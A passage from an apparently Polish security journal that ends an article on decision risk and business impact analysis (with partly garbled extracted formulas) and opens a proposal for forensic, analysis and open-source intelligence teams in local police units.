realizację (to element W) oraz skutki realizacji, a te są zależne także od (konkretnej)
decyzji, czyli elementu aϵA.
12. ξ – rozkład p-stwa na przestrzeni W określony miarą p-stwa Pξ:Ϭ(W)→[0,1],
tzn. znane jest prawdopodobieństwo zajścia każdego zdarzenia z przestrzeni W.
gdzie: Ɛ – symbol wartości oczekiwanej (expected)
Jeżeli zbiór W={w1, w2, …, wn,} jest skończony, wtedy ryzyko (po rozpisaniu całki
Lebesque’a dla zmiennej losowej FS:U→E1 względem miary P) jest równe:
r(ξ, a) =
( ) ( )
1
{, }
n
i
ii
fs w a P w
=
Jeżeli W=E1 i Fξ(w) oznacza dystrybuantę rozkładu ξ, wtedy (po rozpisaniu całki
Stieltjesa) ryzyko jest równe:
r(ξ, a) =
( ) ( )
,fs w a dF w
−
Ryzykiem r(ξ, a) decyzji aϵA względem rozkładu prawdopodobieństwa ξ
na przestrzeni warunków W nazywa się oczekiwaną funkcję strat
r(ξ, a) = Ɛ ξfs (w, a)
18
Rys.1. Elementy składowe ryzyka.
RYZYKO W PODEJMOWANIU DECYZJI DLA POTRZEB BEZPIECZEŃSTWA
Decydent, podejmując decyzje w zakresie zarządzania bezpieczeństwem,
dokonuje wyboru rozwiązania spośród dopuszczalnych w oparciu o posiadaną wiedzę w
przedmiotowej sprawie, przy założeniu spełnienia określonych warunków realizacji tej
decyzji (na przykład dotyczących budżetu przyznanego na realizację decyzji). Z
realizacją decyzji wiążą się określone koszty jej wykonania
12
i możliwości powstania
pewnych strat w podmiocie ochranianym (w szczególnym przypadku takie straty mogą
nie wystąpić). Decyzja decydenta może być jednak realizowana w innych
uwarunkowaniach niż było to zakładane przy jej podejmowaniu, co oznacza, że koszty i
straty z nią związane mogą być inne od zakładanych (dopuszczalnych) [2].
Różnica pomiędzy maksymalnymi rzeczywistymi stratami łącznymi
13
jakie mogą powstać w wyniku podjętej decyzji, a zakładanymi przy jej podejmowaniu
stratami łącznymi, stanowi ryzyko decyzji. Powszechnie przyjmuje się, że ryzyko decyzji
rośnie wraz ze wzrostem niepewności (nieokreśloności) zajścia niepożądanego zdarzenia
oraz wielkości szkody (strat) przez nie poczynionych
14
.
12
Koszty wykonania decyzji mają charakter strat, gdyż środki niezbędne do jej zrealizowania mogłyby być
przeznaczone na inne cele.
13
Tj. maksymalnymi stratami bezpośrednimi jakie mogą powstać w podmiocie ochranianym w wyniku
realizacji decyzji oraz kosztami jej wykonania.
14
Wzrostu niepewności nie należy utożsamiać ze wzrostem prawdopodobieństwa wystąpienia niepożądanego
zdarzenia (tj. powodującego większe straty w podmiocie ochranianym). Jest odwrotnie − gdy rośnie jego
prawdopodobieństwo, to zmniejsza się niepewność odnośnie jego wystąpienia.
19
Jak wynika z tych rozważań, ryzyko jest nierozerwalnie związane z decyzją
− nie ma decyzji nie ma ryzyka. Konieczność podejmowania decyzji w określonych
sytuacjach często wynika z obowiązków decydenta przypisanych do jego stanowiska lub
funkcji. Decydent, podejmując decyzję w jakiejś sprawie:
− zazwyczaj ma niepewną o niej informację,
− powinien mieć świadomość, że warunki jej realizacji mogą różnić się od
zakładanych,
− musi liczyć się z możliwością powstania innych strat niż zakładał (oceniał) przy
jej podejmowaniu.
Przy podejmowaniu decyzji, ryzyko jest jednym z istotnych kryteriów
cząstkowych jej optymalizacji. Wymaga to dokonywania analizy możliwości powstania
strat większych od zakładanych, tj. analizy ryzyka decyzji. W tak rozumianej analizie
ryzyka
15
zawierają się:
− określone działania ukierunkowane na obniżanie wielkości strat w
funkcjonowaniu podmiotu wskutek decyzji związanych z bezpieczeństwem,
przy jednoczesnej minimalizacji (a przynajmniej racjonalizacji) nakładów na ich
realizację;
− metody identyfikacji możliwych zagrożeń oraz sposobów ich realizacji i
określania decyzji (lub reguł decyzyjnych) o sposobie przeciwdziałania
powstawaniu (a przynajmniej minimalizacji) niekorzystnych ich skutków,
pozwalające określić poziom ryzyka decyzji w sposób jakościowy i ilościowy.
Analiza ryzyka w zarządzaniu bezpieczeństwem sprowadza się zatem do
oceny możliwości wystąpienia bardziej niekorzystnych następstw niż przyjęto przy
wyznaczaniu decyzji (reguły decyzyjnej) o działaniach zapobiegających,
przygotowawczych i sposobu reagowania na wypadek realizacji danego rodzaju
zagrożenia Pożądany poziom bezpieczeństwa funkcjonowania podmiotu (np. systemu
informacyjnego lub organizacji określonego typu) jest zapewniany poprzez:
1) Zapobieganie realizacji zagrożeń dziedzinowych (np. zainstalowanie i poprawne
eksploatowanie systemów antywirusowych).
2) Przygotowanie podmiotu i jego systemu bezpieczeństwa na ewentualność ich
wystąpienia (np. wykonywanie kopii bezpieczeństwa baz danych).
3) Prowadzenie skutecznych działań odtworzeniowych (np. odtwarzania baz
danych z kopii bezpieczeństwa) w przypadku zrealizowania się zagrożeń.
4) Likwidację skutków wystąpienia realizacji zagrożeń (np. przywracanie
działalności biznesowej organizacji z lokalizacji zastępczej do lokalizacji
podstawowej).
Decyzje odnośnie zarządzania bezpieczeństwem w etapach 1., 2. i 4., a
także kierowania działaniami odtworzeniowymi w etapie 3., zwykle podejmowane są:
− a priori,
− w oparciu o niepełną i niepewną informację,
− z uwzględnieniem prognozowanego przebiegu następstw realizacji
15
Jak można zauważyć, tutaj analiza ryzyka obejmuje również rozważenie możliwości i kosztów działań
minimalizujących ryzyko, co w podejściu związanym z bezpieczeństwem informacji (patrz np. [10])
zwykle jest wyodrębniane jako oddzielny (od analizy ryzyka) proces.
20
rozpatrywanego zagrożenia,
− z uwzględnieniem szkód i kosztów wynikających ze skutków podejmowanej
decyzji.
Ponieważ realizacje decyzji wiążą się zwykle z określonymi kosztami i
przebiegają w uwarunkowaniach najczęściej odbiegających od przyjmowanych przy ich
podejmowaniu, następstwem tego będą straty odbiegają od zakładanych przy
podejmowaniu decyzji. Do analizy możliwości oceny skutków decyzji o podejmowanych
działaniach zapewnienia podmiotowi bezpieczeństwa funkcjonowania w kategoriach
strat i ryzyka, zasadne jest wyróżnienie następujących warunków podejmowania decyzji:
− uwarunkowania funkcjonowania podmiotu oraz straty ponoszone przez niego
wskutek realizacji określonych rodzajów zagrożeń są zdeterminowane;
− występuje niepewność (opisywana za pomocą zmiennych losowych) odnośnie
uwarunkowań funkcjonowania podmiotu oraz strat ponoszonych przez niego
wskutek realizacji określonych rodzajów zagrożeń;
− występuje nieokreśloność odnośnie uwarunkowań funkcjonowania podmiotu
oraz strat ponoszonych przez niego wskutek realizacji określonych rodzajów
zagrożeń;
− występuje rozmytość (opisywana za pomocą zmiennych lingwistycznych)
wiedzy o uwarunkowaniach i stratach.
Przykłady oszacowań ryzyka w ww. wymienionych uwarunkowaniach w
odniesieniu do zarządzania kryzysowego, można znaleźć w [1] i [2].
Z kolei koszty realizacji decyzji dotyczą działań:
− zapobiegających realizacji zagrożeń,
− przygotowawczych na wypadek zrealizowania zagrożenia,
− reagowania na realizację zagrożenia;
− strat sumarycznych (łącznych), obejmujących straty ponoszone przez podmiot
wskutek realizacji określonych rodzajów zagrożeń oraz koszty realizacji
przedsięwzięć związanych ze zmniejszeniem niekorzystnych dla podmiotu
następstw wyzwalanych danego rodzaju zagrożeniem;
− ryzyka związanego z podejmowanymi (bądź nie podejmowanymi) decyzjami o
działaniach związanych z zapewnieniem podmiotowi bezpieczeństwa jego
funkcjonowania.
RYZYKO A ANALIZA SKUTKÓW BIZNESOWYCH
W wielu praktycznych przypadkach informacje użyteczne dla zarządzania
ryzykiem (nie tylko) w (cyber)bezpieczeństwie, daje Analiza Skutków Biznesowych
(dalej BIA, od angielskiego Business Impact Analysis). W omówieniu przykładu 1, jest
objaśniona metoda BIA i porównana z analizą ryzyka.
Przykład 1.
Firma X świadczy usługi klientom, przetwarzając za pomocą własnych systemów
teleinformatycznych powierzone jej (przez 12 klientów) zasoby informacyjne. Obiekt
(budynek firmy X) z systemami teleinformatycznymi jest zasilany z położonej w
odległości ok. 0,5 km podstacji transformatorowej.
21
Zakładając, że analiza ryzyka będzie przeprowadzona dla usługi wspierającej
„dostarczanie energii elektrycznej do firmy X”, oszacować oczekiwane straty
spowodowane niedostępnością zasobów informacyjnych w ww. systemach
teleinformatycznych, spowodowanych zniszczeniami elementów energetycznych poza
obiektem (płotem otaczającym budynek).
Czyli: jakich należy oczekiwać strat dla firmy X w przypadku zdarzeń w środowisku
zewnętrznym (warunków) powodujących utratę zasilania systemów teleinformatycznych
firmy X i tym samym możliwości świadczenia usługi kluczowej przy założeniu, że firma
X nie podejmie i nie wykona decyzji odnośnie przeciwdziałania takim zdarzeniom.
oraz: jakich strat może oczekiwać dostawca energii elektrycznej do firmy X
16
(jest to
usługa wspierająca) z powodu niedotrzymania warunków SLA (ang. Service Level
Agreement), przy założeniu, że RE nie podejmie i nie wykona decyzji odnośnie
przeciwdziałania takim zdarzeniom. **** (koniec przykładu 1)
Zadanie to należy rozpatrywać z dwóch punktów widzenia:
1. Punkt widzenia firmy X:
Istotny jest fakt utraty zasilania z powodów, które od firmy X są niezależne,
tj. firma X nie wie (i nie musi wiedzieć) jakie zdarzenia spowodowały przerwę w
dostawach energii elektrycznej oraz jakie podatności zostały wykorzystane. Z punktu
widzenia firmy X usługodawca, jakim jest wobec firmy X Rejon Energetyczny, nie
wywiązał się z warunków umowy i nie dostarczył energii elektrycznej w uzgodnionym
czasie i wielkości. W związku z tym firma X nie wywiąże się ze swoich zobowiązań
wobec swoich 12 klientów, tj. nie zapewni im dostępu do powierzonych zasobów
informacyjnych zgodnie z SLA zapisanym w umowach z każdym z nich. W efekcie firma
X może ponieść szkody na wizerunku oraz straty finansowe związane z zapłatą kar
umownych i (ewentualną) utratą niektórych usługobiorców. Zwykle w takim przypadku
oczekiwaną wielkość szkód i strat (a także potencjalnych możliwości ich uniknięcia przez
zbudowanie systemu zabezpieczeń) szacuje się korzystając z metody Analizy Skutków
Biznesowych (ang. Business Impact Analysis – BIA).
W metodzie tej zakłada się, że takie niekorzystne zdarzenie dotyczące
dostępności usługi będzie miało miejsce (zdarzenie pewne, czyli prawdopodobieństwo=1)
a następnie określa się:
− oczekiwaną dostępność danej usługi IT (na podstawie konsekwencji
finansowych, prawnych, biznesowych itd. jej niedostępności). Ta czynność
określa próg strat, powyżej którego ich wielkość dla firmy X staje się
niedopuszczalna;
− wszystkie składowe usługi, które mogą stanowić wąskie gardło lub tzw.
pojedynczy punkt awarii;
− dla każdego elementu składowego wpływ braku zasilania na usługę IT, co
przekłada się m.in. na kolejność przywracania składowych do działania (co
powinno być zapisane np. w DRP – Disaster Recovery Plan);
− składowe, które należy szczególnie chronić (zabezpieczyć).
16
Umownie nazwany w tym przykładzie Rejonem Energetycznym − RE.
22
− możliwe opcje ochrony, w tym koszt ich wdrożenia.
Na koniec, na podstawie uzyskanych w wyniku realizacji ww. czynności
danych, podejmowana jest decyzja, które elementy należy dodatkowo zabezpieczyć i
jakie środki ochrony należy zastosować.
2. Punkt widzenia dostawcy usługi – Regionu Energetycznego (RE):
Istotny jest fakt, że RE może ponieść szkody i straty (kary umowne,
wizerunek itp.) jeżeli nie zapewni dostaw zgodnie z zapisami SLA. Zwykle w takim
przypadku oczekiwaną wielkość szkód i strat (a także potencjalnych możliwości ich
uniknięcia przez zbudowanie systemu zabezpieczeń) szacuje się korzystając z metody
Analizy Ryzyka (ang. Risk Analysis – RA).
W metodzie tej zakłada się, że takie niekorzystne zdarzenie dotyczące
dostępności usługi może mieć miejsce (zdarzenie rzadkie, czyli prawdopodobieństwo≠1)
a następnie określa się:
− możliwość zajścia zdarzenia wpływającego negatywnie na dostępności usługi;
− czynniki (podatności) które umożliwiają realizację takiego zdarzenia;
− straty, które dostawca usługi poniesie, jeżeli nie dotrzyma warunków SLA;
− możliwe opcje minimalizacji podatności, w tym koszt ich wdrożenia.
Na koniec, na podstawie uzyskanych w wyniku realizacji ww. czynności
danych, podejmowana jest decyzja, które elementy należy dodatkowo zabezpieczyć i
jakie środki ochrony należy zastosować.
PODSUMOWANIE
Rozważania o ryzyku przedstawione w tym artykule można krótko
podsumować następująco:
1. Ryzyko jest związane z decyzją: nie ma decyzji – nie ma ryzyka.
2. Decyzję podejmuje podmiot-człowiek.
3. Ryzyko:
− dotyczy przyszłości (skutki decyzji ujawnią się w przyszłości, ale staramy się
je oszacować już teraz, a priori);
− wynika z niepewnej, nieokreślonej lub rozmytej informacji związanej z danym
zdarzeniem (jego przyczynami, skutkami i możliwością zaistnienia);
− wynika z subiektywnych przesłanek podejmowania decyzji;
− jego miarą jest możliwość zajścia zdarzenia, którego dotyczy decyzja,
złożona ze skutkami które w takim przypadku wystąpią.
Czytelnikom zainteresowanym detalami praktycznego zastosowania metod
szacowania ryzyka można polecić publikacje [6] i [7]. W tych artykułach przedstawiono
przykłady szacowania ryzyka IT oraz ich podstawy formalne uwzględniające następujące
założenia:
1. Zbiór zagrożeń jest trójelementowy (siły wyższe, celowe działania wrogich
podmiotów, błędne działania ludzi).
2. Metody szacowania to:
− metoda autorska (patrz [4], [5]), opisowa, wykorzystująca oceny opisowe ze
zbioru: {Niskie, Średnie, Wysokie, Krytyczne}
− metoda według ISO/IEC 27005 [10] wykorzystująca oceny liczbowe ze zbioru
{1, 2, 3, 4}.
23
3. Dostępne są dane historyczne, np. z Rejestru Ryzyka, prowadzonego przez
podmiot, dla którego jest prowadzona analiza ryzyka, oraz dane z wywiadów z
ekspertami.
Dla Czytelnika, który jest zainteresowany szerszym spektrum technik
stosowanych przy ocenie ryzyka (głównie jakościowych), warta polecenia jest norma [9]
która zawiera specyfikację i opis 40 technik szacowania ryzyka przyporządkowanych do
procesów zarządzania ryzykiem zgodnych z [10] (patrz Rys. 2).
Rys.2. Zastosowanie technik szacowania ryzyka w procesie zarządzania ryzykiem według normy
ISO 31000 (za [9]).
24
BIBLIOGRAFIA
1. KOŁODZIŃSKI E., Materiały do wykładu z przedmiotu “Analiza ryzyka”, (SPF)
– 2011/2012, Wyższa Szkoła Pożarnicza, Warszawa.
2. KOŁODZIŃSKI E., Ryzyko decyzji w bezpieczeństwie powszechnym podmiotu,
(rękopis), WAT, Warszawa, 2012.
3. KWIATKOWSKI W., Elementy teorii statystycznych funkcji decyzyjnych, Mate-
riały do wykładów na Studium Doktoranckim, Zeszyt 1. WAT, Warszawa,
1979.
4. LIDERMAN K., Bezpieczeństwo informacyjne. Nowe wyzwania, PWN War-
szawa, 2017.
5. LIDERMAN K., Risk of undesired changes to significant information quality cri-
teria, Teleinformatics Review, Nr 3-4(47), WAT Warszawa 2019, pp. 31-55.
6. LIDERMAN K., Analiza ryzyka na potrzeby bezpieczeństwa informacyjnego we-
dług zaleceń normy PN-ISO/IEC 27005, Przegląd Teleinformatyczny 1-4 (52)
WAT, Warszawa, 2022.
7. LIDERMAN K., Oszacowania ryzyka IT – stadium przypadków, Przegląd
Teleinformatyczny 1-4 (52), WAT, Warszawa, 2022.
8. COBIT® 5, Metodyka biznesowa w zakresie nadzoru nad technologiami
informatycznymi w przedsiębiorstwie i zarządzania nimi, An ISACA®
Framework, wersja językowa polska.
9. PN-ISO 31000:2012, Zarządzanie ryzykiem – Zasady i wytyczne, PKN 2012.
10. PN-ISO/IEC 27005:2014, Technika informatyczna – Techniki bezpieczeństwa –
Zarządzanie ryzykiem w bezpieczeństwie informacji, PKN 2014.
11. PN-EN IEC 31010:2020-01, Zarządzanie ryzykiem – Techniki oceny ryzyka,
wersja językowa angielska.
12. REKOMENDACJA M/2004 – dotycząca zarządzania ryzykiem operacyjnym w
bankach. KNB.
13. PN-EN 61508 1-7: Bezpieczeństwo funkcjonalne elektrycznych/
elektronicznych/ programowalnych elektronicznych systemów związanych z
bezpieczeństwem.
25
PROLETARIUSZE ORGANÓW ŚCIGANIA
LAW ENFORCEMENT PROLETARIANS
Wojciech PILSZAK
1
e-DETEKTYWI SP. Z O.O. / PILSZAK CONSULTING
Streszczenie
W niniejszej publikacji podjęta została próba opracowania wstępnych założeń do
propozycji utworzenia w liniowych jednostkach Policji - na szczeblu komend
powiatowych i miejskich, ale także w wydziałach wykonawczych funkcjonujących w
Komendach Wojewódzkich Policji i Komendzie Stołecznej Policji - zespołów
informatyki śledczej, analizy i białego wywiadu (ZISAB). Utworzenie tych komórek
miałoby wypełnić lukę, jaką spowodowało powstanie Centralnego Biura Zwalczania
Cyberprzestępczości Policji i likwidacja wcześniejszych struktur, w zakresie wsparcia w
typowych czynnościach zabezpieczania i wstępnych analiz cyfrowego materiału
dowodowego w prowadzonych postępowaniach przygotowawczych. W opracowaniu
omówione zostały w sposób ogólny proponowane rozwiązania, zarówno w zakresie
struktury tych komórek jak i wyposażenia ich w niezbędny sprzęt i oprogramowanie, ze
szczególnym naciskiem na dostępne narzędzia dystrybuowane w oparciu o licencję open
source.
Słowa kluczowe: Policja, zabezpieczanie danych, informatyka śledcza, live forensics,
open source
Summary
In this publication, an attempt has been made to develop initial assumptions for the
proposal to create specialized units within the Police - at the level of district and city
commands, as well as in the executive departments operating in Provincial Police
Headquarters (and in Capital City Police Headquarters) - dedicated to digital forensics,
analysis, and open-source intelligence. The establishment of these units is intended to fill
the gap created by the establishment of the Central Bureau Combating Cybercrime of the
Police and the elimination of previous structures in terms of support typical activities
related to securing and preliminary analysis of digital evidence in ongoing preparatory
proceedings. The publication discusses in a general manner the proposed solutions, both
in terms of the structure of these units and the provision of necessary equipment and
software, with a particular emphasis on available tools distributed based on open-source
licenses.
Keywords: Police, data acquisition, computer forensics, live forensics, open source.
1
e-mail: wojciech.pilszak@e-detektywi.pl ORCID ID: 0009-0004-4439-6403
26
Wprowadzenie - wymagania formalne
W okresie od lipca 2021 do lipca 2022 r. w strukturach polskiej Policji nastąpiły
zmiany w zakresie właściwości rzeczowej dotyczącej ścigania cyberprzestępstw. Zamiast
funkcjonujących w każdej Komendzie Wojewódzkiej Policji (i oczywiście w Komendzie
Stołecznej Policji) Wydziałów do walki z Cyberprzestępczością, nadzorowanych przez
Biuro do Walki z Cyberprzestępczością Komendy Głównej Policji, powstała nowa służba,
która w Ustawie o Policji
2
została określona jako służba zwalczania cyberprzestępczości.
Złośliwi twierdzą, iż powstała ona w odpowiedzi na tzw. aferę mailową, zwaną także
aferą Dworczyka, której ujawnienie zbiegło się w czasie z pierwszymi krokami
zmierzającymi do jej powołania. Co prawda pierwsze włamanie na skrzynkę mailową
(przy wykorzystaniu phishingu) głównego bohatera miało podobno miejsce 22 września
2020 r.
3
, ale atakujący mogli mieć do niej dostęp przez dziewięć miesięcy, w tym czasie
zbierając interesujące ich informacje, które następnie od 4 czerwca 2021 r. zaczęli
publikować na kanale „Poufna Rozmowa”, utworzonym na komunikatorze Telegram
4
.
Jednak niniejsza publikacja nie będzie dotyczyła problematyki związanej z tą – bądź co
bądź – bulwersującą sprawą (chodzi oczywiście o przedmiotowy wyciek danych, nie o
stworzenie nowej służby). Nowa służba o nazwie Centralne Biuro Zwalczania
Cyberprzestępczości faktycznie zaczęła funkcjonować 12 lipca 2022 r. Jak możemy
przeczytać na stronie https://cbzc.policja.gov.pl/ - (…) To ważna data w funkcjonowaniu
CBZC. Tego dnia policjanci pełniący służbę w komórkach ds. zwalczania
cyberprzestępczości w KGP i w komendach wojewódzkich przeszli do CBZC, a wraz z
nimi większość prowadzonych przez nich spraw
5
. (…) Informacji o tym, że wraz z
policjantami przesunięto także całość rozwiązań technicznych, którymi dysponowały
Wydziały dw. z Cyberprzestępczością, na stronie nie znajdziemy. Z serwisu nie dowiemy
się także, iż po przesunięciu funkcjonariuszy do CBZC, pozostałe służby, a w
szczególności służba kryminalna i śledcza, z dnia na dzień utraciły możliwość swobodnej
i łatwej współpracy z większością funkcjonariuszy mających pojęcie o zwalczaniu
cyberprzestępczości i prowadzeniu postępowań dotyczących przestępstw z
wykorzystaniem nowoczesnych technologii. To wywołało efekt kuli śnieżnej, który objął
właściwie całą strukturę Policji – Wydziały dw. z Przestępczością Gospodarczą,
dociążone dodatkowo sprawami „cyber”, które nie zakwalifikowały się do dalszego
prowadzenia przez CBZC, przestały przejmować poważniejsze sprawy o charakterze
gospodarczym, pozostawiając je w Wydziałach dw. z Przestępczością Przeciwko Mieniu
w jednostkach podległych, a te z kolei zaprzestały przejmowania poważniejszych spraw
od Komisariatów Policji. O sytuacji w Prokuraturze w sumie nie warto mówić – dość, iż
w chwili obecnej większość postępowań dotyczących szeroko rozumianej
cyberprzestępczości jest prowadzona na poziomie Prokuratur Rejonowych, gdzie nie ma
mowy o jakiejkolwiek specjalizacji. I tego właśnie – czyli jak poradzić sobie w takich
„okolicznościach przyrody” i rozwiązać problem wsparcia merytorycznego dla jednostek
liniowych - dotyczyć będzie niniejsza publikacja. Jednak zanim przejdziemy do meritum,
kilka słów wyjaśnienia związanych z jej tytułem. Według źródeł historycznych termin
„proletariusze” w starożytnym Rzymie był określeniem najbiedniejszej, niemającej ziemi
2
Art. 4 ust. 1 pkt 6 Ustawy z dnia 6 kwietnia 1990 r. o Policji, t.j. Dz. U. z 2023 r. poz. 171 z późn. zm.
3
Afera Dworczyka. Karolina Lewicka o wycieku maili polityków -
https://www.youtube.com/watch?v=nM4YHfNOVEY - ostatni dostęp w dniu 24.10.2023 r.
4
https://pl.wikipedia.org/wiki/Afera_mailowa – ostatni dostęp w dniu 24.10.2023 r.
5
https://cbzc.policja.gov.pl/bzc/o-cbzc/historia-powstania/12,Historia-powstania-Centralnego-Biura-
Zwalczania-Cyberprzestepczosci.html – ostatni dostęp w dniu 24.10.2023 r.
27
grupy społecznej. W późniejszym okresie termin ten ewoluował do formy „proletariat”,
który obecnie, w społeczeństwie informacyjnym, jest rozumiany jako grupa społeczna
nie mająca dostępu do technologii informacyjnych, a w szczególności do Internetu
6
.
Funkcjonariusze jednostek najniższego szczebla, nierzadko mający ograniczony dostęp
do globalnej sieci, narzędzi i szkoleń związanych z wykorzystaniem nowoczesnych
technologii w ściganiu sprawców przestępstw, mogą być postrzegani jako współcześni
proletariusze organów ścigania, a publikacją tą chciałbym rozpocząć dyskusję, która w
konsekwencji doprowadzi do zmiany tej sytuacji. W opracowaniu tym zaproponowane
zostaną ramowe rozwiązania w zakresie sprzętowym, programowym jak i osobowym,
które pozwoliłyby na upowszechnienie przynajmniej niezbędnej wiedzy z zakresu
informatyki śledczej wśród policjantów, którzy znajdują się na pierwszej linii walki z
przestępczością (nie tylko cyber) oraz pozwoliłyby na wykorzystanie podstawowych
narzędzi bez konieczności ponoszenia przez Skarb Państwa znaczących nakładów
finansowych.
Zanim przejdziemy do kwestii dotyczących zasobów ludzkich i
proponowanych rozwiązań programowych, zaczniemy od rzeczy najbardziej prozaicznej,
czyli od sprzętu pozostającego do dyspozycji funkcjonariuszy. Nie od dzisiaj wiadomo,
iż organy ścigania – z wyjątkiem specjalistycznych komórek - raczej nie dysponują
wysokiej jakości sprzętem komputerowym. Niestety, w chwili obecnej zapewnienie
odpowiednio silnych maszyn jest warunkiem sine qua non funkcjonowania,
proponowanego w dalszej części opracowania, rozwiązania. Zapewnienie odpowiednio
szybkich i wydajnych komputerów przełoży się na szybsze analizy i bardziej efektywną
pracę, o wyeliminowaniu czynnika stresogennego związanego z oczekiwaniem na
uzyskanie wyników nie wspominając. O tym, jak ważne są odpowiednie zasoby
sprzętowe niech świadczy fakt, iż ostatnio (jako instytucja specjalistyczna) otrzymujemy
do dalszych badań materiały wstępnie przetworzone przez CBZC w ramach
wykonywania opinii, na rzecz innych jednostek Policji. Problem pojawia się w chwili,
kiedy funkcjonariusze jednostek zlecających czynności otrzymują wyodrębnione i
skategoryzowane za pomocą specjalistycznych narzędzi dane, które dalej sami muszą
przeanalizować (bo jednostka cyber-policji nie świadczy takich usług, ograniczając się
do agregacji i kategoryzacji danych oraz zapewnienia odpowiedniego narzędzia do ich
przeglądania). I w tym momencie brak w jednostce zlecającej jakiegokolwiek
„przyzwoitego” komputera, skutkuje całkowitą nieprzydatnością procesową uzyskanych
materiałów. I to nie z powodu ich niskiej jakości, ale z braku możliwości ich dalszego
przetworzenia i przeanalizowania pod kątem danych istotnych dla prowadzonego
postępowania przygotowawczego. Na dziś, z przykrością należy stwierdzić, że przypadki,
kiedy przez brak komputerów o odpowiedniej mocy obliczeniowej, dostarczony do
analizy materiał nie jest badany wcale lub tylko pobieżnie, są raczej regułą niż wyjątkiem.
Należy pamiętać, iż bez odpowiedniego wsparcia sprzętowego i, co ważne,
wykorzystywanego zgodnie z przeznaczeniem, nawet najlepiej przeszkoleni ludzie i
specjalistyczne rozwiązania nie zagwarantują sukcesu w zwalczaniu cyberprzestępczości.
Zakładając, iż pierwszy krok zostanie wykonany, i jednostki terenowe będą
dysponowały odpowiednimi zasobami sprzętowymi, należy pochylić się nad składem
osobowym komórki wsparcia zwalczania cyberprzestępczości na poziomie komendy
miejskiej lub powiatowej Policji, dalej nazywanego zespołem informatyki śledczej,
analizy i białego wywiadu (ZISAB). Za zasadne należy przyjąć, iż optymalny byłby
6
https://pl.wikipedia.org/wiki/Proletariat – ostatni dostęp w dniu 30.11.2023 r.
28
zespól co najmniej trzyosobowy, składający się ze specjalisty informatyki śledczej
(cyber-technik kryminalistyki
7
), białego wywiadu oraz analityka kryminalnego.
Oczywiście, nic nie stoi na przeszkodzie, aby kompetencje tych trzech osób wzajemnie
się przenikały i uzupełniały, co pozwoli na płynne funkcjonowanie całej komórki. Za taką
konstrukcją zespołu przemawia między innymi fakt, iż współczesna informatyka śledcza,
to już nie tylko odczytywanie i odzyskiwanie danych z różnego rodzaju cyfrowych
nośników informacji, ale także ich korelacja i analiza, bardzo często przy wykorzystaniu
zasobów pozyskiwanych z tzw. otwartych źródeł. Biorąc pod uwagę realia
funkcjonowania organów ścigania, za mało prawdopodobną należy uznać możliwość
powołania większych zespołów na poziomie jednostek z pierwszej linii. Natomiast
rozważając umiejscowienie proponowanych zespołów w strukturach Policji, należy
zdecydowanie wskazać na pion techniki kryminalistycznej. Za takim umiejscowieniem
przemawia fakt, iż zespól ten powinien pełnić rolę usługową dla policjantów pionu
kryminalnego i śledczego, na podobnych zasadach jak jest to realizowane przez obecnych
techników kryminalistyki. Kolejnym, nie mniej istotnym argumentem, jest swoiste
„odseparowanie” tych policjantów od zakusów przełożonych, aby dodatkowo
wykorzystać ich potencjał do prowadzenia np. postępowań przygotowawczych z zakresu
cyberprzestępczości, co całkowicie wypaczyłoby ideę powołania tych zespołów.
Definiując zakres przedmiotowy zespołów informatyki śledczej, analizy i
białego wywiadu należy przede wszystkim zdefiniować potrzeby funkcjonariuszy w
jednostkach liniowych, w zakresie ścigania przestępstw z wykorzystaniem
nowoczesnych technologii oraz zabezpieczaniu materiału dowodowego. W jednostkach
tych – przynajmniej w teorii - nie powinny być prowadzone szczególnie skomplikowane
postępowania dot. cyberprzestępczości. Te powinny pozostawać w zainteresowaniu
wyspecjalizowanych struktur w rodzaju CBZC. Niestety, praktyka pokazuje, że w chwili
obecnej ta, z założenia specjalistyczna formacja, realizuje sprawy o dużej nośności
medialnej, jednakże niespecjalnie skomplikowane, jak operacje międzynarodowe
przeciwko tzw. pedofilom internetowym
8
. Sprawy takie mogłyby być z powodzeniem
realizowane przez komendy miejskie lub powiatowe Policji i właśnie w ich realizacji
proponowane zespoły mogłyby stanowić realne wsparcie. Oczywiście, nic nie stoi na
przeszkodzie, aby funkcjonariusze pracujący w tych zespołach zajmowali się np.
inżynieria wsteczną złośliwego oprogramowania, czy też jego analizą przy
wykorzystaniu narzędzi darmowych dostępnych w sieci – także i tego rodzaju
rozwiązania znajdziemy w zasobach Internetu
9
. Jednakże, w ocenie autora, tego rodzaju
działalność nie powinna być ich aktywnością podstawową. Powinny one raczej skupić się
na wsparciu funkcjonariuszy pionów kryminalnego i śledczego w zabezpieczaniu i
wstępnym badaniu materiału dowodowego, oraz prostych analizach wykonywanych w
ramach prowadzonych postępowań, jak również ich uzupełnianiu o dane pozyskiwane z
otwartych źródeł. Takie działania zdecydowanie przyspieszyłyby prowadzenie
postepowań przygotowawczych, szczególnie w zakresie zabezpieczania dowodów na
pierwszym etapie postępowania przygotowawczego i ich wstępnej analizy, a
jednocześnie zmniejszyłyby znacząco koszty powoływania biegłych do tak trywialnych
7
Nazwa zaproponowana przez e-Detektywi sp. z o.o. w ramach szkolenia rozszerzającego umiejętności
techników kryminalistyki o dodatkowe kompetencje z zakresu informatyki śledczej.
8
https://wydarzenia.interia.pl/kraj/news-zmasowana-akcja-policji-o-trzech-kryptonimach-157-
zatrzymany,nId,7138638 – ostatni dostęp w dniu 9.11.2023 r.
9
https://github.com/mentebinaria/retoolkit - ostatni dostęp w dniu 9.11.2023 r.
29
czynności jak np. wykonywanie większości kopii binarnych. Do takich zadań w
zupełności wystarczające będą rozwiązania licencjonowane na zasadach freeware lub
open source, przy czym przed rozpoczęciem ich wykorzystywania w szerokim zakresie
przez organy ścigania, zasadnym będzie szczegółowe przeanalizowanie warunków
licencji, aby uniknąć w przyszłości zarzutów o ich naruszanie, które mogą w
ostateczności prowadzić do podważenia wartości materiału dowodowego.
Przechodząc do części obejmującej omówienie narzędzi, należy na wstępie
zaznaczyć, iż przedstawione poniżej aplikacje, stanowią wyłącznie wybór autora i nic nie
stoi na przeszkodzie, aby ich zestaw dowolnie rozszerzać lub modyfikować, w zależności
od indywidualnych potrzeb zespołu. Z uwagi na ograniczenia niniejszej publikacji,
możliwości dotyczące przedmiotowych programów zostaną omówione w bardzo
ogólnym zakresie. Dodać ponadto należy, iż problematyka narzędzi wykorzystywanych
w trakcie działań związanych z korzystaniem z otwartych źródeł (OSINT) oraz analizy
nie będzie tutaj podejmowana.
Jedną z najczęstszych czynności, z jakimi spotykają się funkcjonariusze
jednostek liniowych, podczas prowadzenia postepowań związanych z problematyką
cyberprzestępczości, jest zabezpieczanie materiału dowodowego z różnego rodzaju
